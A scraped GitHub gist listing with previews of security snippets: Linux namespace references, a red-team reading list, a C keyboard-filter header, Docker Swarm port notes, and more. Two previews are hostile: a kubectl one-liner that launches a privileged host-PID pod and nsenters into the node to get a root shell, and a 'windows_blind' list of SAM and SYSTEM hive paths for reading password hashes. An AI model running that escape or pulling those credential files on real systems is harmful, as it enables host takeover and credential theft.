Container security notes
Internet references
Kernel and architecture
-
namespaces - overview of Linux namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html
-
mount_namespaces - overview of Linux mount namespaces
View kubectl_root_host.sh
| kubectl run hack1 --restart=Never -t -i -n kube-system --image overridden --overrides '{"spec":{"hostPID": true, "containers":[{"name":"busybox","image":"alpine:3.7","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}' --rm --attach |
View README.md
View gist:606c41ac6ec40bf5c69d4db96d9312e3
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
View ioctlfilter.c
| /* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed. | |
| * Ensures that only valid R400 keys are pressed and not rogue keys injected. | |
| * Main logic for this found here: http://stackoverflow.com/questions/7668872/need-to-intercept-hid-keyboard-events-and-then-block-them | |
| * Author: Etienne Stalmans <etienne@sensepost.com> | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> |
BretFisher
/ docker-swarm-ports.md
Last active Jan 19, 2021
Docker Swarm Port Requirements, both Swarm Mode 1.12+ and Swarm Classic, plus AWS Security Group Style Tables
View docker-swarm-ports.md
Docker Swarm Mode Ports
Starting with 1.12 in July 2016, Docker Swarm Mode is a built-in solution with built-in key/value store. Easier to get started, and fewer ports to configure.
Inbound Traffic for Swarm Management
- TCP port 2377 for cluster management & raft sync communications
- TCP and UDP port 7946 for "control plane" gossip discovery communication between all nodes
- UDP port 4789 for "data plane" VXLAN overlay network traffic
- IP Protocol 50 (ESP) if you plan on using overlay network with the encryption option
AWS Security Group Example
View windows_blind
| %SYSTEMDRIVE%\boot.ini | |
| %WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\system | |
| %SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods. | |
| %SYSTEMROOT%\repair\SAM | |
| %SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files. | |
| %WINDIR%\repair\sam | |
| %WINDIR%\repair\system |